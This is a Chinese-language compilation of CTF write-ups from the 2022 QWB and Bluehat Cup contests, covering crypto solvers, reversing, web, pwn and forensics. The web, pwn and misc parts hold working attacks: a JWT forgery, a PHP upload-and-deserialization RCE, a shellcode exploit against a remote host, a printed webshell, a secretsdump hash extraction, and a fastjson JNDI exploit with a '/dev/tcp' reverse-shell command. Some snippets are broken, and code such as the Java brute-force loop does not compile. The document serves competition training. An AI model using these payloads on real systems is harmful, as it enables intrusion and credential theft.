BinaryFormatter binaryFormatter = new BinaryFormatter();
MemoryStream serializationStream = new MemoryStream(m);
binaryFormatter.Deserialize(serializationStream); 

反编译得到dll

private static void Check1(ulong x, ulong y, ulong z, byte[] KeyStream)
{
    int num = -1;
    for (int i = 0; i < 320; i++)
    {
        x = (((x >> 29 ^ x >> 28 ^ x >> 25 ^ x >> 23) & 1UL) | x << 1);
        y = (((y >> 30 ^ y >> 27) & 1UL) | y << 1);
        z = (((z >> 31 ^ z >> 30 ^ z >> 29 ^ z >> 28 ^ z >> 26 ^ z >> 24) & 1UL) | z << 1);
        bool flag = i % 8 == 0;
        if (flag)
        {
            num++;
        }
        KeyStream[num] = (byte)((long)((long)KeyStream[num] << 1) | (long)((ulong)((uint)((z >> 32 & 1UL & (x >> 30 & 1UL)) ^ (((z >> 32 & 1UL) ^ 1UL) & (y >> 31 & 1UL))))));
    }
}

已知的是keystream为 {101,5,80,213,163,26,59,38,19,6,173,189,198,166,140,183,42,247,223,24,106,20,145,37,24,7,22,191,110,179,227,5,62,9,13,17,65,22,37,5}

利用z3解出,xyz为: x = 156324965,y = 868387187, z = 3131229747

然后写出逆向脚本:

#include <stdint.h>
#include <stdio.h>

int main() {
    uint64_t L[] = {156324965, 868387187, 3131229747};
    uint8_t array_5[] = { 60, 100, 36, 86, 51, 251, 167, 108, 116, 245, 207, 223, 40, 103, 34, 62, 22, 251, 227};
    uint8_t Key[12];
    for (int i = 0; i < 3; i++) {
        for (int j = 0; j < 4; j++) {
            Key[i * 4 + j] = (uint8_t)(L[i] >> (j * 8));
        }
    }
    for (int i = 0; i < sizeof(array_5); i++) {
        array_5[i] ^= Key[i % sizeof(Key)];
    }
    printf("flag{");
    for (int i=0; i<sizeof(array_5); i++) {
        putc(array_5[i],stdout);
    }
    puts("}");
    return 0;
}

CRYPTO

myJWT

难点在ECDSA全0绕过吧

名字直接输个admin好了

之后看一下生成的token

eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW4iLCJhZG1pbiI6ZmFsc2UsImV4cCI6MTY1OTI1NDc4ODE4OH0=.MjyxrlAPnLPKrmRDt_cUQued1zvGrseCTEQbeXhe6Wt0xigwaK-2iEBaVvK_3YyscUFWhtig1XtdFYURC1Q_5jHZjZ8tg0xCy-ZxkjCcoAIQnCnMMZGwbruGhz0Hxu6q

这个样子,前两段还比较规整,解一下码

{
  "typ": "JWT",
  "alg": "myES"
}
{
  "iss": "qwb",
  "name": "admin",
  "admin": false,
  "exp": 1659254788188
}

第一段不用改,第二段把false改成true

第三段就是用0去绕,即16进制下的0000

之后把三段拼接起来

但还是没打通,全0绕过应该没问题,其他能改的也就只有时间了

先改成13个0,不太行,改成13个9就通了

import base64

#eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW4iLCJhZG1pbiI6ZmFsc2UsImV4cCI6MTY1OTI1NDc4ODE4OH0=.MjyxrlAPnLPKrmRDt_cUQued1zvGrseCTEQbeXhe6Wt0xigwaK-2iEBaVvK_3YyscUFWhtig1XtdFYURC1Q_5jHZjZ8tg0xCy-ZxkjCcoAIQnCnMMZGwbruGhz0Hxu6q

part1= b'{"typ":"JWT","alg":"myES"}'
part2 = b'{"iss":"qwb","name":"admin","admin":true,"exp":9999999999999}'
part3 = base64.b64encode(bytes.fromhex(r'0000'))
print(base64.b64encode(part1).decode(), end='.')
print(base64.b64encode(part2).decode(), end='.')
print(part3.decode())
#eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW4iLCJhZG1pbiI6dHJ1ZSwiZXhwIjo5OTk5OTk5OTk5OTk5fQ==.AAA=

QQ图片20220731162915

Factor

第一层,连分数攻击

from Crypto.Util.number import *
import gmpy2
from random import randint
N1=801049932940568005269978912396585741498810389425615966036828877784238116634177290247194019425111606811005728521368879065336038221361037062407029836155148874719789714345603547779284558101833801155509762818376470874215789574939002212274399950433269775325144015468620263028557804618774240232988157961712628677901130814703917513004114547234375629747176834581166306552311075522669403347828095831520693563291249869832390698646691647204371133362254846234990175138047928703289833460734235302093916147489509206061923877623300596194317059884824322527532662470348274079800781120104946546063500763852622187404608639542858285661288293918912184354236687975919510300221932074135531028314170475917110204254042336116619335841213418990605590620842511615815443114612333881430920769002933370887494558640833005339906706603497809846863863967391543647049224309556936909768179259581851520214669904560467640473144481633920438487615788689262961741053146610554997224861331949716721056553499531186695425439163222802917813140266513735841447717418846360096652592844940362932171019143434080184728093326143821165097895058935372215708948088248596585127475770021962501262915274497478428868130455122612016408381607561200802267038869516896665387576895570245272035575637
N2=635401970340205725139325006504978344512744926958688031423448003992072769931808217486709574151492230879374574313457662436423263437792389711379687512056391117410807565492548718691166183372633151644917135272259770997096195518489056319350258673723095417922153182423913759272893696867426193704479752772511081457729513843682588951499551132432923147997238597538055902932123792252593514225328196541483451747314048080824405530742533473914329294346486691684904100406972073037050089861816604505650042953778360621934380815999541183067585498606053857125775979915077329566722531830089714823979965934190338538564188253271016367299890015449611141166780048763403252309160517164569110740561584100839212138661881615351382946813818078899882595313362934594951895560189003438775450675343590147821186953526262224973333962454561275321925151619178204499342339749637758100126893330994252902926509705617882239610380420830791088907378397226817514095468815228186716220057075095711894070032344613244803934541318573847029365563159918970404057137270884587905766828750387753130065274147902379993224780149663600462492281891320702134153853359393588902750423972068679293373333869389393970353760507436913233657422185531482023237384247535554666481760197851108297145147371
E1=1898839980562048754607069073527844852132536432440793106124181406514770178066775988232362054809850074774981836898118651469424148725970708199461113088705044905633592578936333918328544505910996746428679299419879472444790941363558025887620570856598548320246426354974395765243741646121743413447132297230365355148066914830856904433750379114692122900723772114991199979638987571559860550883470977246459523068862898859694461427148626628283198896659337135438506574799585378178678790308410266713256003479022699264568844505977513537013529212961573269494683740987283682608189406719573301573662696753903050991812884192192569737274321828986847640839813424701894578472933385727757445011291134961124822612239865
E2=1262647419018930022617189608995712260095623047273893811529510754596636390255564988827821761126917976430978175522450277907063247981106405519094560616378241247111698915199999363948015703788616554657275147338766805289909261129165025156078136718573006479030827585347458143645738353716189131209398056741864848486818076440355778886993462012533397208330925057305502653219173629466948635110352752162442552541812665607516753186595817376029707777599029040724727499952161261179707271814405907165207904499722122779096230563548011491932378429654764486855147873135769116637484240454596231092684424572258119768093562747249251518965380465994055049411715353547147466711949391814550591591830515262296556050946881
c1=18979511327426975645936984732782737165217332092805655747550406443960209507493506811471688957217003792679188427155591583024966608843371190136274378868083075515877811693937328204553788450031542610082653080302874606750443090466407543829279067099563572849101374714795279414177737277837595409805721290786607138569322435729584574023597293220443351227559400618351504654781318871214405850541820427562291662456382362148698864044961814456827646881685994720468255382299912036854657082505810206237294593538092338544641919051145900715456411365065867357857347860000894624247098719102875782712030938806816332901861114078070638796157513248160442185781635520426230183818695937457557248160135402734489627723104008584934936245208116232179751448263136309595931691285743580695792601141363221346329077184688857290503770641398917586422369221744736905117499140140651493031622040723274355292502182795605723573863581253354922291984335841915632076694172921289489383700174864888664946302588049384130628381766560976143458735712162489811693014419190718601945154153130272620025118408017441490090252674737105557818759190934585829634273698371996797545908125156282869589331913665938038870431655063063535672001112420959158339261862052308986374193671007982914711432579
c2=336587005671304527566745948355290412636261748969581976214239578621816863343117433524033533838636941679300497270909696775021031004312477997130741361709262822736904340641138652359632950455651920464042448022467664596484055174270895170499076347333381222768518599018520948098943626229061996126260154604038101543546588917619576702866444998578555907070990331574722135141778182631559802154493815687284077524469331290249057291163803290619701104007028836609832847351748020354798788508790258935718399783002069490123663345156902440501507117289747695510266461539019431610123351176227443612317037899257774045751487135646052309277098939919088029284437221840182769808850184827681307611389353392683707516141736067793897378911235819049432542758429901945202632117089595899280390575706266239252841152490534353760118231918190110043319877744119083811214707593122757409240645257409097436061825613686773916466122693168971062418046703969144004779270391320645495586024342668002497155358623795942692477164489475917351003149045087283510728981096449890130735055015075557614253867698702479920619299919816768972581273507837309179450374634916567083251630203067065663910073926990517108921490442919372774170201239734064819301693527366233007925670043499415100789027665
def continuedFra(x, y): #不断生成连分数的项
    cF = []
    while y:
        cF += [x // y]
        x, y = y, x % y
    return cF
def Simplify(ctnf): #化简
    numerator = 0
    denominator = 1
    for x in ctnf[::-1]: #注意这里是倒叙遍历
        numerator, denominator = denominator, x * denominator + numerator
    return (numerator, denominator) #把连分数分成分子和算出来的分母
def getit(c):
    cf=[]
    for i in range(1,len(c)):
        cf.append(Simplify(c[:i])) #各个阶段的连分数的分子和分母
    return cf #得到一串连分数

def wienerAttack(e, n):
    cf=continuedFra(e,n)
    for (Q2,Q1) in getit(cf):#遍历得到的连分数,令分子分母分别是Q2,Q1
        if Q1 == 0:
            continue
        if N1%Q1==0 and Q1!=1:#满足这个条件就找到了
            return Q1
    print('not find!')

q1=wienerAttack(N1,N2)
p1=gmpy2.iroot(N1//q1,2)[0]
p2=gmpy2.next_prime(p1)
q2=gmpy2.next_prime(q1)
q1=wienerAttack(N1,N2)
p1=gmpy2.iroot(N1//q1,2)[0]
p2=gmpy2.next_prime(p1)
q2=gmpy2.next_prime(q1)

phi1=p1*(p1-1)*(q1-1)
phi2=p2*(p2-1)*(q2-1)

d1=gmpy2.invert(E1,phi1)
d2=gmpy2.invert(E2,phi2)

m1=gmpy2.powmod(c1,d1,N1)
m2=gmpy2.powmod(c2,d2,N2)
print(m1)
print(m2)

拿到m1,m2

第二层跟d3的factor差不多

from Crypto.Util.number import *
import gmpy2
from random import randint
e1=167033559384298522723574512241709447697750495062051373339874928117760768631565225663704494711294488556402223152830158600944819657473430506318731286655519728589208977191031849602792050411662024383502548579402516538753112670329781366297260905517214408459895097308286783418547254449419676568096534767340832822470233461516097690657337287889405321592527860524201824371955082411119548743528220794151774190322092515459637969925138496615421690273925560390321721643556915400569894100488394008220811596560968566833296068500476868375996187754631888256419438775013308064639754700359028260289266420692324376220460340153811660590804281527733243177527178698523018103373311259548716062006020121615186595491453534952848570829485638553678760994354019044715078062414748269425818079274218450448217803229617020494546843594180682307375768323235309661628678546003718924902228908888185484412626429441196588985691713767554591991735686919964937441820738008046218954331990752603146125777571183543616375946363623251491371247594696767767918341279655251868517380267258878990871525012299220182939441091806206624720194246691865367941280852353547267930167542329486261552854451001546455904682702366584763940463481732752992487773878685793275652314513014646439770319249
e2=528908333772228053870150517777953367335694353543283293928107007105805981569637097891844234195347783647199578874468284796426025332558494294059108873949547330263207080437351101040010406089677188027313053264978629299687395636717663190621529245681709036339566402398201002643798407423977271049502646105003835787133389379635868110574843126773929111600145385353264742427132255636940531836717766700943155444006525067567928492100937301953101284837072415482389244281100420949167147262480015637994591140135893270599322980627218209819028413248385391551494197892310625280099420944704389013898082342765511755739866196324853709119765550568093952556513571824446904540070352904383957902455585718139141792085592802732069585311104513522264805198165016394660735565395311133198856644061918175212720663463984421244532338281620144332779961409764676749423116554110456699460499985367820982402797410298974559456634218573249390061986168504814840590855659775036153363131236606128174234510226177845731635017057610438715188557100755932006571508650011757136100654121967651161401355109644581796661617575606701308891372847002628593087803872565603329331848297810099113534848144502190130705031486967964233996621609997286299351070796681267134148737178338468642708912452
# sagemath
from Crypto.Util.number import *
import gmpy2,hashlib

c=18352572608055902550350386950073774530453857897248738030380007830701135570310622004368605208336922266513238134127496822199799761713782366178177809597137102612444147565578155260524747439899150012223027218489946124086276814899675563837669559795153349686434242738207425653079514376089070980797596457151965772460109519623572502109592612394316680202287712465721767341302234806130244551387296133051760893033194962691942040228545508895009195291106297581470066545991352668826197346830561010198417527057944507902143965634058848276017283478933675052993657822322866778994956205033704582047618324071045349072526540250707463112668579342537349567247810715604220690215313641329522674080146047291570752430231923566302463491877377617044768978997438596643458475128936850994934029476030136643053997549253792076260765459166618369864942681056864815996253315631930002738854235841120321870075261782250357506436825550088826469396508045912258303652912217151127280959435741419961721418428605515096160344688795655562889755165362006775317188009008288782691705879510655892181975003485714604340542378477388225736316682379616676770234557939471098919647053799313777248678455620231721202780830980063824003076308811540534492317719811588898727134190545533822501681653
N=209798341155088334158217087474227805455138848036904381404809759100627849272231840321985747935471287990313456209656625928356468120896887536235496490078123448217785939608443507649096688546074968476040552137270080120417769906047001451239544719039212180059396791491281787790213953488743488306241516010351179070869410418232801398578982244984544906579574766534671056023774009163991804748763929626213884208260660722705479782932001102089367261720194650874553305179520889083170973755913964440175393646890791491057655226024046525748177999422035469428780228224800114202385209306803288475439775037067014297973202621118959024226798935588827359265962780792266516120013602384766460619793738405476219362508944225007365127768741191310079985425349292613888185378948854602285379329682053663283534930182589905986063348509703027498270111412063194971956202729807710253369312175636837558252924035002153389909587349043986253518050303628071319876207392440085675892353421232158925122721273720564784886530611286461575045181073744696415657043278123662980166364494583141297996445429477446442693717498789391918530672770193730629928408766563592081857706608049076318165712479742423149330311238462044666384622153280310696667586565906758451118241914402257039981388209
e = 65537

r = 7
a = (e2 - e1) * gmpy2.invert(e1*e2,N) % N
# assert a < N
P.<x> = PolynomialRing(Zmod(N))
f = x - a
x = f.small_roots(X = 2^1000,beta = 0.4)
x = x[0]
k_phi = e1*e2*x - (e2 - e1)
p_ = gcd(k_phi,N)

p = gmpy2.iroot(int(p_),r - 1)[0]
# print(p)
q = N // (p**r)
# print(q)
n = p * q
phi_n = (p - 1) * (q - 1)
d = gmpy2.invert(e,phi_n)
# print(n)
b = pow(c,d,n)
print(b)

之后求a

b = 17623328397444755087284107444487160871617682792372566887446834913712379373851213638071138745775127796589871734472781755930251379295485892067473329763997583502625804363418069062645997342172778252731889437
n =539779851369541956878655738599584730199799866957191805784596190682932284216781781433367450841202917758999300635019369629627621029957135109806205877317954671312041249493462048283611940752235036153024920172209763260723728345918562258401803973624430150143563078517485996070862532682695228590709019451174548520135142052216785774589096706631010293690859363524584240662502290912412366366114571976050857239915691266377257797199583543940504695517331512813468837128344612227973709974625418257243011036826241599265375741977853552204640800449679679351666009764297016524814036295707311913711955324055690490892097177271718850857268982130811714517356073266905474635370690445031512184247179039751734276906533177939993769044135143389748416635981226449566039039202521305851567296884751935162651063209779647359922622084851547605090230221057349511482738300221222563908357379545905837110168948295030747460300104202323692732549831403834387939156877086852393515817984772384147449841124275061609701453997579569931391166586163299940486204581696722731952467570857217406030804590055255431828403195798003509083922294733709507134156466158642941338493323430671502043066148246348074878064089651235355282144209668143249348243220714471988019011613749340243917652821
e =464117832584849256876245026858584166064013216027422756825795521498385205721033353513543618744373301203834470328759823648931860535796880222946332534013897265901185999170322696957199889753713456154697105417293751933841379534096463865819008983795657599018683644132673713309334758819574886354704377483001339445757386992879690723631576273460553131155155316952245089907130766287714080403627930928130784991277544248116386917402984270528525775247134214492560997905367291867183866607941929214468777104690392820823035675612092617083295882759857152154377282721152947480472621698324590869278751145403323940075314010289498908873588009861230984997557274773415874956453307178971675014333345657736750118816545969164208900208803031938469633040195998941962960862469507517241931009534811253696410851868499055867913530737331005151134014871819905410958792932531597274862405076661694656088513465559617186646712502574197476333665637476068284511221311807581941866208929989854046731148928578091744976377612425409987679627546723108095722115773079517077535943913527056273328898166164977293075443526474958962783904307031337910198587916917973655637855317764238521650195864421643538425185311500988998567302569476110003110592320332553740947779735694862664952369085
P.<x> = PolynomialRing(Zmod(n))
f=x*e-b
f=f.monic()
roots=f.small_roots(X = 2^1400,beta = 0.1)
print(roots)
roots=294866274408712047678895960697991796212718579573936596836350500904468502218427834796417591238222148091931340753936000222281569744266019750430211654722075797384954654710457113918192542434048948398831257908434305283458100642927247282103490062909889256688655451935432173818152393630704035385060658526039909159552056525786612091305264928266802746198633875167664060187506803992352570002580592061741528343377377
a=roots//b
print(a)

有了a之后可以求phi了,一切也就迎刃而解

from Crypto.Util.number import *
from gmpy2 import *
from random import randint
a=16731588253866128571163910758846497670928988943944436618514118121761227689113110943465936457030051710610254169629932203082368465978112219532158626669990117160986135699541953274434781877420432743573801621
b=17623328397444755087284107444487160871617682792372566887446834913712379373851213638071138745775127796589871734472781755930251379295485892067473329763997583502625804363418069062645997342172778252731889437

e3=8179300978753084587812861894047395225516049110376948812109811319430275614612773726672345893359691900281432484382670047044697374818043512731533402576374645405477207239801498428774783768163880078495448747421425078521981578408638790336528372019271073712013371141939808017049399434858687299480461753638164719404612128939787055797762174745092074547412183349192156638711750872083313795551439465507724807626674514935170104573715458782366469587138508845980490673890245713729782917089910271980557159592807350504157192913530007199510144004848020221181558472160543018733124225266127379373751910439604459368078652499029070936707349862139053913745186413782066470461478961703013591655136140060879250067379283913798867648758171004535775565306842444545755351202796833177560656564652632975685912935281581268141803696686952259539945588609591385807620108279333498170028167338690235117003515264281843953984997958878272347778561933726792473981855755454522886321669676790813189668084373153897754540290867346751033567500922477317530445967753955221454744946208555394588111484610700789566547507402309549957740815535069057837915204852490930168843605732632328017129154852857227895362549146737618906180651623216848500491438142456250653458053922622240299736136335179639180898730269690699965799644757774472147210271111150769048976871249731156387939260749192370361488285775377622944817570292095201906142567403539151179209316853493906909989301225903409448461436855145
phi = (e3//b)*a - 1
n=539779851369541956878655738599584730199799866957191805784596190682932284216781781433367450841202917758999300635019369629627621029957135109806205877317954671312041249493462048283611940752235036153024920172209763260723728345918562258401803973624430150143563078517485996070862532682695228590709019451174548520135142052216785774589096706631010293690859363524584240662502290912412366366114571976050857239915691266377257797199583543940504695517331512813468837128344612227973709974625418257243011036826241599265375741977853552204640800449679679351666009764297016524814036295707311913711955324055690490892097177271718850857268982130811714517356073266905474635370690445031512184247179039751734276906533177939993769044135143389748416635981226449566039039202521305851567296884751935162651063209779647359922622084851547605090230221057349511482738300221222563908357379545905837110168948295030747460300104202323692732549831403834387939156877086852393515817984772384147449841124275061609701453997579569931391166586163299940486204581696722731952467570857217406030804590055255431828403195798003509083922294733709507134156466158642941338493323430671502043066148246348074878064089651235355282144209668143249348243220714471988019011613749340243917652821
c=113097822337683973761068913398570777162211043704088253732500045618770280334319497174908657828372816818344430304314992760410247741225285170975119344962728883084314382093407445567724674775086423808679124143380073906159023182353116556175251427048715466914368972746661938211846262612414049036821553068430149530397389927209475908905748728402722287875974303298260579839357610962198145974153609818939841880084892796820949226354126424023144300953584658958900737493704530725894948802258740332090822797815745616247879170037794873059391625680745994045522420168248552864215035136318711240256011217929372430302003068882829637056296413462078222453765071094277727760527662423010417144554652783429899139309180017349156600053882338180319473460877576898373222480215735280046214925463242092830060830764299787309912687294672319845054775281463150375545716818434962456139485501224661520991156961587158843064393883274763714930309353593180897123378717852182761518709151878662808890356934477932099818218743384674756674800089177733447066489275506387382342429495897972218764782517198727316942685748481956118012927027254979181519862451112593068440686462293151078537886822555211870303467014484443432209106264020502334805536091587252238173816637270028678636848763
r=7
d=invert(e3,phi)

# print(n)
m = pow(c,d,n)
print(long_to_bytes(m))

强网先锋

RCEFILE

原题:2017 湖湘杯复赛web400 · sky's blog (skysec.top)

www.zip下载源码

config.inc.php

<?php
spl_autoload_register();
error_reporting(0);

function e($str){
    return htmlspecialchars($str);
}
$userfile = empty($_COOKIE["userfile"]) ? [] : unserialize($_COOKIE["userfile"]);
?>
<p>
    <a href="/index.php">Index</a>
    <a href="/showfile.php">files</a>
</p>

upload.php

<?php
include "config.inc.php";

$file = $_FILES["file"];
if ($file["error"] == 0) {
    if($_FILES["file"]['size'] > 0 && $_FILES["file"]['size'] < 102400) {
        $typeArr = explode("/", $file["type"]);
        $imgType = array("png","jpg","jpeg");
        if(!$typeArr[0]== "image" | !in_array($typeArr[1], $imgType)){
            exit("type error");
        }
        $blackext = ["php", "php5", "php3", "html", "swf", "htm","phtml"];
        $filearray = pathinfo($file["name"]);
        $ext = $filearray["extension"];
        if(in_array($ext, $blackext)) {
            exit("extension error");
        }
        $imgname = md5(time()).".".$ext;
        if(move_uploaded_file($_FILES["file"]["tmp_name"],"./".$imgname)) {
            array_push($userfile, $imgname);
            setcookie("userfile", serialize($userfile), time() + 3600*10);
            $msg = e("file: {$imgname}");
            echo $msg;
        } else {
            echo "upload failed!";
        }
    }
}else{
    exit("error");
}
?>

没有过滤.incspl_autoload_register函数利用方法:(210条消息) spl_autoload_register的可能性利用_q1352483315的博客-CSDN博客

直接写一个inc上传

<?php
system('cat /flag');
?>

修改Content-Type: image/jpeg

image.png

image.png

手写反序列化:

O:32:"aea50d927222240db51d4d916eeaa233":O:{}

image.png

include包含路径,覆盖cookie:userfile

image.png

WP-UM

image.png

看文章username可以知道用户名是MaoGePaMao,已知用户名密码以文件形式存在,可以写脚本,也可以BurpSuite爆破

(另外从dockerfile中可以看出username和password在不同目录,注意替换)

image.png

Username:MaoGePaMao Password:MaoGeQiFeiLa

image.png

image.png

爆破也可以。

修改文件上传类型

image.png

image.png

image.png

ASR

非预期了

用yafu跑了20分钟跑出来了因子

20EP_PUVQB@AKMI4F9.jpg

套模板:

from Crypto.Util.number import *

n = 8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
p = 260594583349478633632570848336184053653
q = 260594583349478633632570848336184053653
r = 223213222467584072959434495118689164399
s = 223213222467584072959434495118689164399
t = 218566259296037866647273372633238739089
u = 218566259296037866647273372633238739089
v = 225933944608558304529179430753170813347
w = 225933944608558304529179430753170813347

c = 945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149

P.<a>=PolynomialRing(Zmod(p),implementation='NTL')
f=a^3-c
mpx=f.monic().roots()

P.<a>=PolynomialRing(Zmod(q),implementation='NTL')
g=a^3-c
mqx=g.monic().roots()

P.<a>=PolynomialRing(Zmod(r),implementation='NTL')
h=a^3-c
mrx=h.monic().roots()

P.<a>=PolynomialRing(Zmod(s),implementation='NTL')
i=a^3-c
msx=i.monic().roots()

P.<a>=PolynomialRing(Zmod(t),implementation='NTL')
j=a^3-c
mtx=j.monic().roots()

P.<a>=PolynomialRing(Zmod(u),implementation='NTL')
k=a^3-c
mux=k.monic().roots()

P.<a>=PolynomialRing(Zmod(v),implementation='NTL')
l=a^3-c
mvx=l.monic().roots()

P.<a>=PolynomialRing(Zmod(w),implementation='NTL')
j=a^3-c
mwx=j.monic().roots()

for mpp in mpx:
    x=mpp[0]
    for mqq in mqx:
        y=mqq[0]
        for mrr in mrx:
            z=mrr[0]
            for mss in msx:
                a=mss[0]
                for mtt in mtx:
                    b=mtt[0]
                    for muu in mux:
                        c=muu[0]
                        for mvv in mvx:
                            d=mvv[0]
                            for mww in mwx:
                                e=mww[0]
                                try:
                                    solution=long_to_bytes(int(CRT_list([int(x),int(y),int(z),int(a),int(b),int(c),int(d),int(e)], [p,q,r,s,t,u,v,w])))
                                    if b'flag' in solution:
                                        print(solution)
                                except:
                                    pass

polydiv

模2环境下解多项式方程

编程太麻烦,表弟在家,20块钱哄他帮我手撸

用以下式子求出来复制进去,重复40次,拿到flag

p = 2
S.<x> = PolynomialRing(GF(p))

r = x^14 + x^12 + x^10 + x^8 + x^5 + x^3
a = x^7 + x^6 + x^5 + x^3 + x
c = x^6 + x^4 + x

print((r-c)/a)

image.png

devnull

栈溢出

fget有栈溢出,可以覆盖到后面的标识符为stdin,从而多了一次输入。

程序返回的时候第三参数为7所以我们可以构造利用mprotect设置bss断权限

然后写shellcode执行即可

rom pwn import *
sh=remote('123.56.45.155',44916)
eax=0x401351
leave=0x401354
rbp=0x40129d
code=b'\x48\x31\xC0\x6A\x3B\x58\x48\x31\xFF\x48\xBF\x2F\x62\x69\x6E\x2F\x73\x68\x00\x57\x54\x5F\x48\x31\xF6\x48\x31\xD2\x0F\x05'
payload=0x34*b'A'+p64(0x3ff000-8)+p64(0x3ff000-8)+p64(leave)
payload+=p64(0x3ff000)+p64(rbp)+p64(0x3ff000-8+0x18)+p64(eax)
payload+=p64(0x4012D5)+p64(0xdeadbeef)+p64(0x3ff030)+code
p.send(payload)
p.interactive()

2022 BluehatCup | Writeup

MISC

domainhacker

提取流量中的压缩包

image.png

追踪TCP流,看一下shell

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split("/;|:/",$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)) {
            continue;
        }
        ;
        $tmdir=$item."/.c46a89a";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\//",$tmdir);
        for ($i=0;$i<sizeof($cntarr);$i++) {
            @chdir("..");
        }
        ;
        @ini_set("open_basedir","/");
        @rmdir($tmdir);
        break;
    }
    ;
}
;
;
function asenc($out) {
    return $out;
}
;
function asoutput() {
    $output=ob_get_contents();
    ob_end_clean();
    echo "79c2"."0b92";
    echo @asenc($output);
    echo "b4e7e"."465b62";
}
ob_start();
try {
    $p=base64_decode(substr($_POST["yee092cda97a62"],2));
    $s=base64_decode(substr($_POST["q8fb9d4c082c11"],2));
    $envstr=@base64_decode(substr($_POST["p48a6d55fac1b1"],2));

    $d=dirname($_SERVER["SCRIPT_FILENAME"]);
    $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
    if(substr($d,0,1)=="/") {
        @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if(!empty($envstr)) {
        $envarr=explode("|||asline|||", $envstr);
        foreach($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r="{$p} {$c}";
    function fe($f) {
        $d=explode(",",@ini_get("disable_functions"));
        if(empty($d)) {
            $d=array();
        } else {
            $d=array_map('trim',array_map('strtolower',$d));
        }
        return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
    }
    ;
    function runshellshock($d, $c) {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("a@127.0.0.1", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    }
    ;
    function runcmd($c) {
        $ret=0;
        $d=dirname($_SERVER["SCRIPT_FILENAME"]);
        if(fe('system')) {
            @system($c,$ret);
        } elseif(fe('passthru')) {
            @passthru($c,$ret);
        } elseif(fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif(fe('exec')) {
            @exec($c,$o,$ret);
            print(join("",$o));
        } elseif(fe('popen')) {
            $fp=@popen($c,'r');
            while(!@feof($fp)) {
                print(@fgets($fp,2048));
            }
            @pclose($fp);
        } elseif(fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while(!@feof($io[1])) {
                print(@fgets($io[1],2048));
            }
            while(!@feof($io[2])) {
                print(@fgets($io[2],2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif(fe('antsystem')) {
            @antsystem($c);
        } elseif(runshellshock($d, $c)) {
            return $ret;
        } elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
            $w=new COM('WScript.shell');
            $e=$w->exec($c);
            $so=$e->StdOut();
            $ret.=$so->ReadAll();
            $se=$e->StdErr();
            $ret.=$se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    }
    ;
    $ret=@runcmd($r." 2>&1");
    print ($ret!=0)?"ret={$ret}":"";
    ;
}
catch(Exception $e) {
    echo "ERROR://".$e->getMessage();
}
;
asoutput();
die()

在TCP第13流发现压缩包密码,

image.png

image.png

解压以后发现是mimikatz记录,查看NTLM ,即为flag

image.png

flag{416f89c3a5deb1d398a1a1fce93862a7}

domainhacker2

在流量包提取压缩包密码:

image.png

image.png

解压以后,获得ntds.dit SYSTEM SECURITY文件,放到同一目录下然后用impacket进行解密

 python3 secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL -history

image.png

image.png

因为题目要求是之前的hash,所以要获取之前的hash值

flag{07ab403ab740c1540c378b0f5aaa4087}

WEB

Ez_gadget

参考链接:红队武器库:fastjson小于1.2.68全漏洞RCE利用exp (zeo.cool)

工具链接:https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.jar

fastjson1.2.62 需要爆破key

脚本:

package baopo;
public class baopo{
    public static void main (String[] args){
        for (int i = 0;i < 999999999;i++){
            int key = String.valueOf(i).hashCode() ==key){
                System.out.pintln(i)
            }
        }
    }
}

8179E06F-B82B-D1DC-0A21-2B15A0D360F1.jpg

在自己服务器上启动服务

java -cp fastjson_tool.jar fastjson.HRMIServer x.x.x.x 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/6666 0>&1"

但是黑名单过滤了\x,只需要unicode编码就可以绕过。要把rmi用unicode编码

FB225DDB-1F40-4148-32AC-B9440B19D669.jpg

DB9A3FF6-09F2-5295-C839-0E3C2A13546B.jpg

flag{e513e5cc-b3ba-4451-8027-6f213b4ffedf}

取证

手机取证_1

直接查找文件名,

image.png

导出查看:

image.png

